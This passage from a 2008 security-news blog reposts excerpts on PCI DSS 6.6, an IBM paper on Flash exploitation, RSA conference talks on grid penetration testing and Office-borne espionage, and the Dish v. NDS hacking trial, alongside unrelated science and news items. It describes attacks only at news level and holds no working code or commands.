Russo said that the PCI standard lives on a two-year lifecycle, and the next version comes due in September. A beta version of the standard will be released in August to the council's 500 participating organizations, as well as all of the council's qualified security assessors for feedback. They'll have 30-45 days to look it over for a "sanity check," Russo said. "It's a pretty good checks-and-balances system."

Russo said that additional guidance and clarification will be available in May for requirement 6.6, which moves from best practice to mandatory on June 30. PCI 6.6 has been the subject of some confusion for merchants trying to interpret how it's written. The section, which falls under the main heading of developing and maintaining secure systems and applications, covers the security of Web-facing applications. As of June 30, it will mandate that Web apps be protected against known attacks by either having custom code reviewed by a third party, or by installing an application-layer firewall in front of a Web app.

"There are guidance documents coming out that will clarify a lot of this stuff before June," Russo said.

The council recently posted a new document on its site called Navigating the DSS, which goes through each of the requirements in detail, explaining the intent and how requirements can be met.

The confusion over 6.6 rests in the either-or nature of the wording.

"Personally, I'd love to see everyone go through an OWASP-based source-code review, but certainly, that's not going to happen," Russo said, referring to the expensive and time-consuming process of manual code reviews. "So the application firewall is probably the best thing to do, but there needs to be some clarification around what it needs to do. That clarification is coming; that's been the biggest question."

Friday, April 11, 2008

IBM: Application-Specific Attacks - Leveraging the ActionScript Virtual Machine

Memory corruption vulnerabilities are becoming increasingly difficult to exploit, largely due to the protection mechanisms being integrated into most modern operating systems. As general protection mechanisms evolve, attackers are engaging in more specific, low-level application-targeted attacks. In order to refine general countermeasures (or at least raise awareness of their shortcomings), it is important to first understand how memory corruption vulnerabilities are exploited in some unique scenarios.

The following case study describes a unique exploitation scenario using a recently disclosed flash vulnerability that was reported to Adobe by IBM. At first the vulnerability seemed to offer limited exploitation options, but further analysis uncovered an application-specific attack that results in reliable, consistent exploitation. Achieving the same exploitation with more conventional methods is unlikely. The technique presented leverages functionality provided by the ActionScript Virtual Machine – an integral part of Adobe Flash Player. Further, it will be shown that the vulnerability can be successfully exploited without leaving telltale signs, such as a browser crash following the attack.

Although this document deals specifically with the Win32/intel platform, similar attacks can most likely be carried out on the many other platforms flash is available for. In particular, some of the methodology discussed might be useful for constructing a robust exploit on Unix platforms as well as several embedded platforms. Understanding the specific scenarios used to exploit memory corruption vulnerabilities will help improve protection strategies.

----------------------------

By Mark Dowd
X-Force Researcher IBM Internet Security Systems
http://documents.iss.net/whitepapers/IBM_X-Force_WP_final.pdf

Six Pirates Captured in Hijacking of French Yacht Off Somalia

Via FoxNews -

French officials on Friday said six pirates have been captured in connection with a Somali hijacking.

Pirates earlier had freed 30 hostages held aboard a French tourist yacht off Somalia's coast for the past week, French President Nicolas Sarkozy said Friday.

In a statement, Sarkozy thanked the French army and other French agencies "that allowed a quick end" to the hostage-taking. The statement did not elaborate on the role of the French military, but said the hostages were freed "without incident."

The statement did not say when the hostages were released or where they were. Foreign Minister Bernard Kouchner said France would organize the hostages' return "as soon as possible" and welcomed the "happy ending" to the standoff.

Sarkozy will meet the families of the hostages in Paris on Friday afternoon.

Pirates seized the yacht, called Le Ponant, in the Gulf of Aden on April 4. It was carrying 30 crew members, including 22 French citizens and six citizens of the Philippines.

Does The Future Hold an Algae-Powered Bimmer?

Via Argonne National Laboratory -

Independent tests conducted by engineers at the U.S. Department of Energy's (DOE) Argonne National Laboratory on the mono-fueled version of the BMW Hydrogen 7 prototype have found that the car's hydrogen-powered engine surpasses the super-ultra low-emission vehicle (SULEV) level, the most stringent emissions performance standard to date.

"The BMW Hydrogen 7's emissions were only a fraction of SULEV level, making it one of the lowest emitting combustion engine vehicles that have been manufactured," says Thomas Wallner, a mechanical engineer who leads Argonne's hydrogen vehicle testing activities.

"Moreover, the car's engine actively cleans the air. Argonne's testing shows that the Hydrogen 7's 12-cylinder engine actually shows emissions levels that, for certain components, are cleaner than the ambient air that comes into the car's engine." It was not an easy task to measure the Hydrogen 7's emissions. "A gross polluter is easy to measure, but the cleaner the car the harder it is to test," says Don Hillebrand, director of Argonne's Center for Transportation Research. "Most labs test at the SULEV level. Argonne's vehicle testing facilities are unique in that they are able to detect even trace levels of emissions. In this case, it was near-zero emissions."

After an extensive evaluation by BMW, "Argonne's Advanced Powertrain Research Facility was found to be the only public test facility in North America capable of testing hydrogen vehicles at these low emissions levels," says BMW's Wolfgang Thiel, manager, operating support emissions analysis. "Zero is a very small precise number—we are pushing the boundaries of emissions testing."

BMW has put the bi-fueled hydrogen model into limited series production. Although the vehicle is not yet available for sale to the general public, it is being made available to "influential public figures," whose use demonstrates a new era in clean energy, BMW has said. In the meantime, the greatest challenge to widespread use of hydrogen cars is the limited number of hydrogen refueling stations.

Scientists at U.S. Dept. of Energy's Argonne National Laboratory are looking for an alternative to fossil fuels by working to chemically manipulate algae for production of the next generation of renewable fuels—hydrogen gas. "We believe there is a fundamental advantage in looking at the production of hydrogen by photosynthesis as a renewable fuel," senior chemist David Tiede says.

"Right now, ethanol is being produced from corn, but generating ethanol from corn is a thermodynamically much more inefficient process." Some varieties of algae, a kind of unicellular plant, contain an enzyme called hydrogenase that can create small amounts of hydrogen gas.

Tiede said many believe this is used by nature as a way to get rid of excess reducing equivalents that are produced under high light conditions, but there is little benefit to the plant. Tiede and his group are trying to find a way to take the part of the enzyme that creates the gas and introduce it into the photosynthesis process. The result would be a large amount of hydrogen gas, possibly on par with the amount of oxygen created.

"Biology can do it, but it's making it do it at 5-10% yield that's the problem," Tiede says. "What we would like to do is take that catalyst out of hydrogenase and put it into the photosynthetic protein framework. We are fortunate to have Professor Thomas Rauchfuss as a collaborator from the Univ. of Illinois at Champaign-Urbana who is an expert on the synthesis of hydrogenase active site mimics."

Algae has several benefits over corn in fuel production. It can be grown in a closed system almost anywhere, including deserts or even rooftops, and there is no competition for food or fertile soil. Algae is also easier to harvest because it has no roots or fruit and grows dispersed in water. "If you have terrestrial plants like corn, you are restricted to where you could grow them," Tiede says.

"There is a problem now with biofuel crops competing with food crops because they are both using the same space. Algae provide an alternative, which can be grown in a closed photobioreactor analogous to a microbial fermentor that you could move any place." Tiede admitted the research is in its beginning phases, but he is confident in his team and their research goals. The next step is to create a way to attach the catalytic enzyme to the molecule.

------------------

http://www.youtube.com/watch?v=uxoFSxM8o8k

Thursday, April 10, 2008

RSA: Homeland Security Secretary Outlines Gov Cybersecurity Plans

Chertoff discusses new measures to fight cyberattacks

At RSA 2008 in San Francisco, Secretary of the U.S. Department of Homeland Security Michael Chertoff discusses a new directive focusing on an early warning system to identify cyberattacks before they start.

http://news.zdnet.com/2422-13568_22-196726.html

----------------------------

For those that don't keep up with US government security, Einstein is a new intrusion detection and analysis program that the government plans to install on all points of entry into the government network.

While the steps outlined by Secretary Chertoff are very sensible...most major corporations are ahead of the government.

Given the size of the government network, this project is a huge undertaking...but it is a necessary step and should provide a strong foundation to build upon.

Dish Network Tells Court News Corp Unit Hacked It

Via reuters.com -

Hackers hired by a News Corp unit stole and posted data that allowed free access to Dish Network's satellite television service, the company said, in a corporate spying trial against its rival that could be worth hundreds of millions of dollars.

Dubbed the "Black Hat Team," the computer whizzes flooded the market with smart cards that allowed free satellite TV access, a lawyer for Dish said on Wednesday. The suit was brought by EchoStar Communications which later split into two companies, Dish and EchoStar Corp.

A lawyer for News Corp's NDS Group denied that the company engaged in spying, saying during opening statements in the trial that it was instead engaged in reverse engineering by obtaining the codes and was monitoring piracy.

"Because this is a competitive business, NDS also monitors competitors," NDS attorney Richard Stone told jurors. "NDS has done nothing to illegally harm or damage EchoStar. All NDS has done is compete hard and fair in the marketplace."

Dish is suing NDS and NDS Americas in a corporate espionage trial that U.S. District Judge David Carter said could bring an award of "hundreds of millions or perhaps billions."

The potential damages are based on claims of lost revenue and the cost of fixing the compromised system.

"(NDS) came up with a plan - take these hackers off the streets and turn them on the competitors," Dish's lead attorney, Wade Welch, told the jury. "They called it the Black Hat Team."

NDS, which provides encryption technology to a global satellite empire that includes News Corp's DirecTV in the United States, "made the calculated decision to hire the worst and most well-known satellite pirates and hackers in the world in an effort to establish and maintain control ... over its competitors' technology," EchoStar claims in its lawsuit.

The spying allegedly began in 1998 when DirecTV was constantly getting hacked and was debating whether to leave NDS and sign on with EchoStar's superior system, Welch said.

Dish is claiming copyright violation, conspiracy, and piracy in a case that is expected to last a month and produce testimony from hackers and top company officials from as far away as Israel, Europe, Switzerland and Canada.

Experts Hack Power Grid in No Time

Via NetworkWorld -

Cracking a power company network and gaining access that could shut down the grid is simple, a security expert told an RSA audience, and he has done so in less than a day.

Ira Winkler, a penetration-testing consultant, says he and a team of other experts took a day to set up the attack tools they needed, then launched their attack, which paired social engineering with corrupting browsers on a power company's desktops. By the end of a full day of the attack, they had taken over several machines, giving the team the ability to hack into the control network overseeing power production and distribution.

Winkler says he and his team were hired by the power company, which he would not name, to test the security of its network and the power grid it oversees. He would not say when the test was done, but referred to the timeframe as "now." The company called off the test after the team took over the machines.

"We had to shut down within hours," Winkler says, "because it was working too well. We more than proved that they were royally screwed." In addition to consulting, Winkler is author of the books Spies Among Us and Zen and the Art of Information Security.

Espionage Against Pro-Tibet Groups, Others, Spurred Microsoft Patches

Via Wired.com -

Computer intruders targeting pro-Tibetan groups, U.S. defense contractors and government agencies slipped in through previously unknown security holes in Microsoft Office, prompting Microsoft to issue a flurry of patches to the popular software suite in 2006 and 2007, according to computer security experts.

These attacks, which appeared to have originated in China, began in early 2006 when the attackers started sending e-mails to victims with booby-trapped Word documents and Excel spreadsheets attached.

"We are seeing more and more spying done with Trojans, a shift that has happened in the last two years," Mikko Hyppönen, the chief research officer for software security vendor F-Secure, told RSA conference attendees Thursday morning.

The Pentagon and pro-Tibet groups have previously acknowledged the intrusions, but Hyppönen is the first to link the cyber espionage to a series of patches that Microsoft pushed out without explanation. Microsoft did not immediately reply to a request for comment.

Hyppönen's colleague Patrik Runald notes that from 2005 through early 2006, Microsoft issued few patches for its Office suite. But soon after there was an explosion of patches for critical bugs that could be used to infect a computer, including a record 26 patches in October, 2006, that fixed four critical bugs in Microsoft Office applications.

Those fixes, Runald says, appeared contemporaneously with the rise of targeted attacks on defense companies, nonprofits and government agencies. "They now have an incentive to begin looking for bugs and exploiting them," Runald said. "Bad guys are finding these things fast."

The attackers relied on e-mails tempting the victim to open the attachments, in some cases by presenting them as résumés from job seekers.

But when the target opened the attachment, the application would usually crash, while the embedded code covertly installed a keylogger and data-stealing software that scooped up documents anywhere on the organization's network to which the user had access.

The malware then forwards the stolen information to services called DNS bouncers in China, such as 8800.org, that attackers can use to obfuscate and rapidly change where stolen documents or passwords are sent. Finally, the code opens up what looks to be a legitimate document, in the hopes that the target won't know his or her computer was just infected.

The espionage was highly successful, according to Hyppönen. One multi-billion-dollar defense contractor who went to F-Secure for help found that a single compromised Windows box had been secretly siphoning information to a server in mainland China for 18 months.

"Most attacks go unnoticed and targets don't know they are hit," Hyppönen said.

Hyppönen won't declare that the espionage is the work of the Chinese government or hackers loyal to it, though all the evidence points that way.

"Is it the Chinese?," Hyppönen asked. "It sure looks like it but it could be a smokescreen. We don't know."

Dark Websites and Black PR

By definition, a dark website is a pre-made, non-visible website that can be activated online when a particular crisis occurs. It is common for most companies to have several, all of them customized according to certain vulnerabilities and corporate risks. They store written-in-advance news releases, pictures, official statements and other background information, as the specific details will only be added right before their release.

The dark site can be placed on a separate domain, be a distinct section of the main website or totally replace the original. It could be saved on any of the corporate servers or be kept safely on a preferred external device.

Because of the significance of dark websites, they have also become targets of many malicious scenarios. Probably the scariest threat for companies is someone intentionally triggering the content of the site online, without the permission of management. The system administrators will soon repair the “mistake”, but the point here is totally different. The actual goal of the attackers is not to create a false appearance of crisis, but to make a destructive buzz and to lower the public trust towards the target. Even if instantly refuted by the corporate crisis team, the situation will still be strong enough to cause a massive confusion among the audience, especially when all of the Web 2.0 applications allow you to achieve that in a matter of minutes. And remember - the information on the Internet always remains cached, so the chances of someone going back to those issues are actually pretty high.

http://www.spinhunters.org/blog/dark-websites-hide-many-security-threats/

--------------------

Black PR is pretty interesting stuff.

Why attack a huge mega-corporation's firewall, when you could attack their stock price just as easily (perhaps even more easily)?

IBM's 'Phantom' to Study Virtual Security

Via DarkReading -

RSA Conference 2008 -- IBM has begun a new research project designed to find and fix security vulnerabilities in virtual computing environments.

The project, a joint initiative between IBM's X-Force security research team and IBM Research, is code named Phantom. It will help identify potential vulnerabilities in virtualized environments and use network and host intrusion prevention technology to guard them.

"There's a lot of momentum behind virtualization out there, but not everyone has thought through the security implications," says Joe Anthony of IBM's Tivoli unit. "Phantom is taking a deeper look at those."

Under Phantom, IBM will develop technology to monitor and disrupt malicious communications between virtual machines. Phantom will also seek out ways to monitor the security state of virtual machines to protect them against known and unknown threats before they occur. "We'll analyze behavioral patterns, not just signatures," Anthony says.

IBM is also looking for ways to secure the hypervisor, which is a central point of control for all machines running on a virtualized platform. "We'll be looking not only at our own platform, but at different hypervisors from different vendors," Anthony says.

The Mac Guru of Damascus in the Case of the Missing Laptops

Via Wired.com -

Before my fiancée and I headed to Syria to study Arabic, we often heard there was one advantage to living in a police state: almost no crime. So it came as a surprise when Sara and I returned to our Damascus apartment one night after a dinner party to find splintered wood in the hallway — wood that had once been part of our front door.

I made a beeline for the living room to check on our most valuable possessions: my MacBook and Sara's MacBook Pro. Both gone.

There's no 911 in Damascus, so we called our landlord, who contacted the cops. Within an hour, a dozen police were on the scene. About half of them sat around fingering unlit cigarettes. (Pushy Americans, we had asked them not to smoke inside.) The others engaged in what could generously be called an investigation. They took fingerprints from the door. They dusted the fridge. "Maybe the robber was thirsty," one said. They did not dust the coffee table where the laptops had been sitting.

The size of the police contingent was itself disconcerting. Damascus' finest had probably come out in force simply because it's not often a foreigner's home gets burglarized. But it's easy to get paranoid in Syria. We wondered whether some of the cops — like the ones wearing dark leather jackets — were "special" police, more interested in us than the crime. (Being a foreign journalist in Syria on a tourist visa can invite extra attention. Also, how to put this delicately, we were returning home from a Shabbat dinner.)

The next morning, our landlord accompanied us to the local police station to press our case. The commander was a friendly, well-fed man with an impressive mustache and the terminal stage of a comb-over. He asked a few questions about the theft and many more about the progress of our studies.

Eager to please, I told him a few Arabic jokes I had learned. ("There's this guy with a monkey, see. Along comes a hash addict ...") When I finished, he sat stone-faced — then burst into thunderous laughter. "I like this man!" he bellowed, pinching my cheeks. Sara would have taken a snapshot had our camera not also been stolen.

A few hours later, our computers were back, but it wasn't the police who found them. A friend had put us in touch with Bassel Al Hassan, apparently the one guy in Damascus who services Macs. A few days later we shared a meal with Hassan, a soft-spoken man in his mid-thirties. "Yours were the seventh and eighth stolen Macs I've recovered," he said. "Nobody knows about Macs here. A few other stores buy Macs, but eventually they all come to me, asking, 'Is it good? How much is it worth?' Then I check the serial numbers."

When Hassan learned our laptops had been pilfered, he called about 20 computer shops. "I didn't tell the owners I was looking for stolen computers, because then maybe they wouldn't buy them," he said.

Soon Hassan got a call about two newly arrived Macs and hustled over to the shop. He confirmed the computers were ours and told the store owner the machines were hot. The proprietor, who had paid $200 for the pair, gave them back to us without taking a penny in exchange, sheepishly delivering them to us at a street corner in our neighborhood. The only thing Hassan asked was permission to "friend" me on Facebook.

A few months later, after Sara and I returned to the US, I spoke with Hassan by phone. He said that he had corralled another stolen Mac just weeks after rescuing ours. From back here in the States, Hassan's role as the Mac Avenger of Damascus seems improbable. Except that I'm writing this article on my recovered laptop.

---------------------

Awesome story.

Lessons from Cyber Storm II

Via GCN -

When things start to go bad on the Internet, communication is the critical element in an effective response, participants in the recent Cyber Storm II exercise said Wednesday at the RSA Security conference.

“There was still a shortfall in information sharing,” said Randy Vickers, associate deputy director of the U.S. Computer Emergency Readiness Team (US-CERT), the national center for first response in cybersecurity.

Vickers was part of a panel of government and industry participants in the recent exercise who shared their lessons. The discussion was short on specifics because participants signed nondisclosure agreements to ensure that sensitive data about systems and vulnerabilities is not leaked. An after-action report is expected to be published this fall, but among the preliminary lessons discussed, the need for communication was the one recurring theme.

“Cyber Storm II was fundamentally about identifying and responding to a fast-breaking cyber epidemic,” said Greg Garcia, assistant secretary for cybersecurity and communications at the Homeland Security Department.

The weeklong exercise held last month was the product of 18 months of planning and involved 18 U.S. federal agencies, five countries, nine states, 40 companies, and 10 information sharing and analysis centers. The scenario involved disruptions of telecommunications, the Internet and control systems.

“One of the things we learned was how important vendors are in a crisis,” Garcia said. They are the ones who know what the products are and how they work. Agencies and companies need to establish strong relationships with vendors of critical systems well in advance of a crisis, he added.

Vickers said US-CERT had learned the need for effectively gathering and disseminating information in the original Cyber Storm exercise and built on that in preparation for the second Cyber Storm. “We’re doing things right,” he said. “It is still better than it was,” but there are improvements to be made.

Playing Dead Works For Young Fire Ants Under Attack

Via ScienceDaily -

Pretending to be dead is an effective self-defense strategy adopted by young fire ant workers under attack from neighboring colonies. This tactic makes them four times more likely to survive aggression than older workers who fight back. As a result, these young workers are able to contribute to brood care and colony growth to ensure the survival and fitness of their queen.

These findings were made by Dr. Deby Cassill from the Biology Department at USF Petersburg in Florida and her team from USF Tampa in Florida.

Feigning death is a method of self-defense used by a wide range of species - mammals, birds, amphibians, lizards, dragonflies, and beetles - in response to threats by predators. Cassill and colleagues studied the death feigning behavior of the highly territorial fire ant, Solenopsis invicta, during attacks by ants from neighboring colonies in the laboratory.

They showed that the age of the victims was a significant predictor of their response to their aggressors. Days-old workers responded to the attacks by pretending to be dead. Weeks-old workers responded by fleeing and months-old workers fought back. By feigning death, young workers were four times more likely to survive the attack than were the older workers who ran away or fought back. The researchers also found that sustained movement from the victims was necessary to trigger a physical attack – known as a kinetic cue.

The authors offer two possible explanations for the death feigning behavior of the young fire ants. The external skeleton of days-old workers is relatively soft. Not only are these young workers prone to injury, they are ineffective in battle as their mandibles and stingers are not sufficiently hardened to penetrate the external skeleton of their aggressors. It may be that young workers pretend to be dead to avoid physical aggression at a time when they are vulnerable to injury and certain to fail. Another explanation is that by feigning death, young valuable workers are spared, allowing them to increase colony growth, which is essential to the survival and fitness of the colony queen.

Wednesday, April 9, 2008

NextGen Nuclear Fuel May Be Too Hot To Handle

Via Physorg.com -

New high-efficiency nuclear fuel meant to burn longer and stronger may prove unstable in an emergency and hard to dispose of, according to experts cited in a report published Wednesday.

By further enriching the uranium used to power nuclear reactors, operators have been able to extract more electricity from a given amount of fuel, a measure expressed in gigawatt-days per tonne of uranium (GWd/tU).

Ramping up fuel efficiency has worked especially well in the pressurised water and boiling water reactors used in the United States and elsewhere.

The objective has been to extract more power from fuel and produce less radioactive waste, one of the most vexing problems associated with nuclear energy.

A new generation of nuclear plants in the United States and Britain is poised to use reactors designed for "burn-up rates" of 60 GWd/tU, according to the British weekly New Scientist, which canvassed experts.

"At these rates, uranium fuel rods should burn for around a year longer than today's best burn-up fuel," the magazine said.

But tests conducted by Michael Billone at Argonne National Laboratory in Illinois, presented last month at a conference in Washington, showed that burn-up rates above 45 GWd/tU would violate US Nuclear Regulatory Commission's (NRC) safety standards unless new methods were devised for packaging the fuel, the magazine reported.

A sudden loss of cooling water -- as happened during the partial meltdown of a reactor core in 1979 at Three Mile Island in Pennsylvania -- would pose such a danger, according to the simulations.

The US nuclear energy industry's Electric Power Research Institute says that such a loss of coolant is not possible in modern reactors, but the NRC has still launched a three-year review of its safety standards.

"We are actively preparing to revise NRC's safety criteria to account for the burn-up effect," a commission spokesman told New Scientist.

Disposal is also a potential problem because the new, high-efficiency fuel is up to 50 percent more radioactive than fuel currently in use, thus generating far more heat during storage.

Traffic Jams Happen, Get Used to It

Via ScienceMag.org -

Ever wondered what causes those inexplicable traffic jams on open stretches of highway, the ones without any accidents, construction, or other obvious bottlenecks? A Japanese group has an answer: It's pure physics. A simple experiment shows that when the density of vehicles on a road passes a certain threshold, traffic jams emerge because of fundamental instabilities inherent in multiparticle interactions. In other words, just a few mildly inconsistent drivers on the road will eventually cause a wave of backups.

The cause of so-called phantom traffic jams has been quite controversial, says Dirk Helbing, who studies the physics of social interactions at the Swiss Federal Institute of Technology in Zürich, Switzerland. One camp of traffic researchers believes that even phantom jams have external causes, be they merging traffic, curves, hills, or even a few bozos abruptly changing lanes. But other researchers contend that jams will spontaneously appear simply if the vehicle density exceeds a certain critical value. Yuki Sugiyama, a physicist at Nagoya University in Japan, says the predictions of these models have matched observations of highway traffic.

UMG Says Throwing Away Promo CDs is Illegal

Via EFF -

In a brief filed in federal court yesterday, Universal Music Group (UMG) states that, when it comes to the millions of promotional CDs ("promo CDs") that it has sent out to music reviewers, radio stations, DJs, and other music industry insiders, throwing them away is "an unauthorized distribution" that violates copyright law. Yes, you read that right -- if you've ever received a promo CD from UMG, and you don't still have it, UMG thinks you're a pirate.

This revelation came in a brief for summary judgment filed by UMG against Troy Augusto. Augusto (aka Roast Beast Music Collectibles, eBay handle roastbeastmusic) buys collectible promo CDs at used record stores around Los Angeles and resells them on eBay. UMG sued him last year, claiming that the "promotional use only" labels on the CDs mean that UMG owns them forever and that any resale infringes copyright. EFF took Augusto's case to fight for the proposition that a copyright owner can't take away a consumer's first sale rights just by putting a label on a CD (after all, the Supreme Court first recognized the first sale doctrine when a book publisher tried the same thing with a label stating "may not be sold for less than one dollar," and we've seen patent owners trying the same trick on printer cartridges). In